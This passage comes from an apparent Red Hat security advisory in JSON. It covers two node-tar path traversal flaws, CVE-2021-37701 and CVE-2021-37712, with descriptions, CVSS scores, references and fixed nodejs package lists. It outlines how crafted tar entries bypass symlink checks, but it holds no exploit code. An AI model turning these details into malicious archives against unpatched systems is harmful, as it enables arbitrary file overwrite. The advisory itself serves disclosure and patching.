Bugzilla ID", "text": "1999731" } ], "notes": [ { "category": "description", "text": "A flaw was found in the npm package \"tar\" (aka node-tar). Extracting tar files that contain both a directory and a symlink with the same name, where the symlink and directory names in the archive entry used backslashes as a path separator, made it possible to bypass node-tar symlink checks on directories. This flaw allows an untrusted tar file to extract and overwrite files into an arbitrary location. A similar confusion can arise on case-insensitive filesystems. The highest threat from this vulnerability is to integrity and system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux version 8 and Red Hat Software Collection both embed `node-tar` in the npm command. However, npm explicitly prevents the extraction of symlink via a filter. npm might still be affected via node-gyp, if the attacker is able to control the target URL.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37701" }, { "category": "external", "summary": "RHBZ#1999731", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999731" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37701", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37701" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37701", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37701" }, { "category": "external", "summary": "https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc", "url": "https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc" }, { "category": "external", "summary": "https://www.npmjs.com/advisories/1779", "url": "https://www.npmjs.com/advisories/1779" } ], "release_date": "2021-08-31T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite" }, { "cve": "CVE-2021-37712", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-08-31T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1999739" } ], "notes": [ { "category": "description", "text": "A flaw was found in the npm package \"tar\" (aka node-tar). Extracting tar files that contain two directories and a symlink with names containing Unicode values that normalize to the same value on Windows systems made it possible to bypass node-tar symlink checks on directories. This allows an untrusted tar file to extract and overwrite files into an arbitrary location. The highest threat from this vulnerability is to integrity and system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux version 8 and Red Hat Software Collection both embed `node-tar` in the npm command. However, npm explicitly prevents the extraction of symlink via a filter. npm might still be affected via node-gyp, if the attacker is able to control the target URL.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37712" }, { "category": "external", "summary": "RHBZ#1999739", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999739" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37712", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37712" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37712", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37712" }, { "category": "external", "summary": "https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p", "url": "https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p" }, { "category": "external", "summary": "https://www.npmjs.com/advisories/1780", "url": "https://www.npmjs.com/advisories/1780" } ], "release_date": "2021-08-31T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", 